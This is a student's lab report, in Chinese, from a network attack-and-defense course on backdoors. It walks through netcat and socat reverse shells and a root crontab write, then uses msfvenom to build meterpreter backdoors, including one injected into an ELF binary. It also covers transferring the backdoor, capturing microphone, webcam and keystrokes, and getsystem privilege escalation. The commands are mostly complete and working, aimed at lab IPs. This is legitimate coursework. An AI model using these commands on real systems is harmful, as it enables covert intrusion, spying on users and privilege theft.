網路攻防實驗報告
姓名:田青
學號:20222305
實驗日期:2024/10/16 — 2024/10/23
實驗名稱:後門原理與實踐
指導教師:王志強
1.實驗內容
本週學習內容總結::
後門概念:不經過正常認證流程而訪問系統的通道。
後門型別:編譯器後門、作業系統後門、應用程式後門、潛伏於作業系統中或偽裝為特定應用的專用後門程式。
以及一些造成重大損失的案例。
實驗要求:
掌握後門原理及免殺技術
回答問題
(1)例舉你能想到的一個後門進入到你係統中的可能方式?
惡意軟體、利用未修補漏洞、遠端桌面協議(RDP)攻擊。
(2)例舉你知道的後門如何啟動起來(win及linux)的方式?
Win:惡意軟體安裝、登錄檔修改、任務排程、DLL注入;
Linux:shell指令碼、Cron任務、TCP、IP監聽。
(3)Meterpreter有哪些給你映像深刻的功能?
好多指令都需要特定格式,生成的檔案有時候不適配,必須要掌握好它才能發揮出全部實力。
(4)如何發現自己有系統有沒有被安裝後門?
使用Wireshark監控網路流量;使用msconfig檢查啟動項;使用工作管理員檢視程序。
2.實驗過程
2.1實踐目標
(1)使用netcat獲取主機操作Shell,cron啟動某項任務(任務自定)
PS:cron是linux下用來週期性的執行某種任務或等待處理某些事件的一個守護程序
(2)使用socat獲取主機操作Shell, 任務計劃啟動
(3)使用MSF meterpreter(或其他軟體)生成可執行檔案(後門),利用ncat或socat傳送到主機並執行獲取主機Shell
(4)使用MSF meterpreter(或其他軟體)生成獲取目標主機音訊、攝像頭、擊鍵記錄等內容的後門,並嘗試提權
(5)使用MSF生成shellcode,注入到實踐1中的pwn1中,獲取反彈連線Shell。
2.2實驗過程
2.2-1.1查詢主機IP與虛擬機器IP
注意:實驗分三次做完主機IP和虛擬機器IP都變過詳情見指令。
ipconfig
ifconfig
2.2-1.2下載ncat並配置環境
2.2-1.3Win獲得Linux Shell
windows開啟監聽:
ncat.exe -l -p 2305
Linux反彈連線win:
nc 192.168.31.102 2305 -e /bin/sh
windows下獲得一個linux shell,可執行任何指令,如ls:
ls
2.2-1.4 Linux獲得Win Shell(擴充)
Linux輸:
/var/www/html
再輸:
nc -l -p 2305
WIN:
ncat.exe -e cmd.exe 192.168.31.14 2305
Linux:
nc -l -p 2305
會出現:
點選檢視程式碼
Microsoft Windows [�汾 10.0.22631.4317]
(c) Microsoft Corporation����������Ȩ����
C:\Users\86136>
回到win,寫入檔案:
echo "* * * * * echo "tianqing" > /home/tq/20222305.txt" > /var/spool/cron/crontabs/root
查詢虛擬機器對應資料夾,發現修改成功
2.2-2.1使用socat獲取主機操作Shell, 任務計劃啟動
下載socat
win主機輸入:socat.exe tcp-listen:2305 exec:cmd.exe,pty,stderr
Linux輸:socat - tcp:192.168.39.218:2305
2.2-2.2準備程式
一個簡單的開啟edge瀏覽器程式碼
點選檢視程式碼
#include <stdlib.h>
int main() {
// 使用 system 函式呼叫開啟 Edge 瀏覽器
system("start msedge");
return 0;
}
Win輸:schtasks /create /sc minute /mo 1 /tn "20222305" /tr C:\Users\86136\Desktop\20222305.exe
20222305:程序名
C:\Users\86136\Desktop\20222305.exe:檔案在主機的地址
2.2-2.3在命令列和計算機管理任務計劃程式中觀察到
2.2-3.1在Linux下使用MSF meterpreter生成可執行檔案,利用ncat或socat傳送到Windows主機並執行獲取主機shell
關閉防火牆和實時保護:
生成病毒檔案:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.14 LPORT=8888 -f exe > 2305backdoor.exe
LHOST=192.168.31.14是虛擬機器地址;
LPORT=8888是攻擊者的系統上監聽的埠號;
-f exe指定了生成的 payload 的格式,這裡是exe;
20222305backdoor.exe即生成的惡意可執行檔案
2.2-3.2將後門檔案傳輸至目標主機並將生成的後門檔案2305backdoor.exe傳給主機
win輸入:
ncat.exe -lv 8888 > "C:\Users\86136\Desktop\2305backdoor.exe"
Linux輸入:
nc 192.168.31.101 8888 < 2305backdoor.exe
在win桌面發現:
2.2-3.3配置監聽模組
回到虛擬機器輸入命令
msfconsole
進行配置:
use exploit/multi/handler(使用監聽模組,設定payload)
set payload windows/meterpreter/reverse_tcp (使用和生成後門程式時相同的payload)
set LHOST 192.168.31.14 (攻擊機的IP地址,和生成後門程式時指定的IP相同)
set LPORT 8888(監聽的埠)
接著輸入exploit,使監聽模組開始執行,並在Windows終端執行後門2305backdoor.exe檔案
回虛擬機器輸入ls
發現成功了
2.2-4.1使用MSF meterpreter(或其他軟體)生成獲取目標主機音訊、攝像頭、擊鍵記錄等內容,並嘗試提權
獲取目標主機音訊、截圖、攝像頭、鍵盤記錄
在exploit模組中繼續輸入以下命令:
record_mic (音訊)
screenshot (截圖)
webcam_snap (拍照)
keyscan_start (開始讀取鍵盤記錄)
keyscan_dump (讀取鍵盤記錄結束)
螢幕截圖與鏡頭照片:
2.2-4.2提權
確保windows的cmd指令是使用管理員身份執行的,繼續在exploit模組中繼續輸入:
getuid (檢視當前使用者)
getsystem (提權指令)
2.2-5.1使用MSF生成shellcode,注入到實踐1中的pwn1中,獲取反彈連線Shell
在虛擬機器中輸入:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.31.14 LPORT=8888 -x /home/tq/Desktop/pwn1 -f elf -o 20222305_pwn
命令詳解:
-p linux/x86/meterpreter/reverse_tcp:指定生成的有效載荷。
LHOST=192.168.31.14:設定反向連線的主機地址。
LPORT=8888:設定反向連線的埠。
-x /home/tq/Desktop/pwn1:指定要修改的現有可執行檔案的路徑。
-f elf:指定輸出格式為 ELF(Linux 可執行檔案)。
-o 20222305_pwn:指定輸出檔名。
對生成的20222305_pwn檔案賦予許可權:
chmod a+x 20222305_pwn
2.2-5.2重現監聽過程:
開啟另一個shell,執行生成的20222305_pwn檔案(需要使用root許可權)
2.2-5.3回到第一個shell,輸入ls確認連線,成功實現遠端控制shell
3.問題及解決方案
-
問題1:無法輸入指令nc
-
問題1解決方案:nc不是windows下的指令,需要輸入ncat.exe來執行。
-
問題2:uname命令無法使用
-
問題2解決方案:在linux中用指令開啟檔案。
-
問題3:拒絕連線
-
問題3解決方案:這是一個順序問題必須虛擬機器掛上指令後再連。
-
問題4:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.14 LPORT=8888 -f exe > 2305backdoor.exe生成的2305backdoor.exe無法使用
-
問題4解決方案:很多人都會去考慮架構問題,其實不然,關鍵在於許可權不夠,只要以管理員身份執行命令提示符就行。
-
問題5:提權時連線超時
-
問題5解決方案:輸入
sessions --interact 1 --timeout 60
並等待一段時間。 -
問題6:Msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.31.14
LPORT=8888 -x /root/Desktop/pwn1 -f elf > 20222305_pwn中:“-x”用不了
-
問題6解決方案:改成命令“msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.31.14 LPORT=8888 -x /home/tq/Desktop/pwn1 -f elf -o 20222305_pwn”調整了“-x”格式。
4.學習感悟、思考等
遇到的困難和問題很多,與同學探討很多都找不到答案,但只需要用管理員身份執行或者關閉防火牆和實時病毒監控,按照指導書再做一遍就好了;很神奇,但也反映出來一件問題就是,只要駭客獲得電腦的最高許可權,你就在劫難逃,他可以很輕鬆的關閉所有防護,執行任何電腦上的程式,如入無人之境。我們一定要牢牢抓住主權,不要貪小便宜,落入社會工程攻擊的陷阱,否則就會淪為“階下囚”。同時透過這些實驗,我深入理解了如何利用多種工具進行滲透測試和後門建立。這不僅讓我認識到網路安全的複雜性,也讓我意識到實施這些技術的道德責任和法律後果。我們應當將這些技能應用於合法的安全測試和防禦,而不是用於惡意目的。同時,掌握這些技術也幫助我更好地理解如何保護系統免受這些攻擊。
參考資料
- 《 0x21_MAL_後門原理與實踐.md》
- 《20192415 2021-2022-2 《網路與系統攻防技術》實驗二實驗報告
》學習指導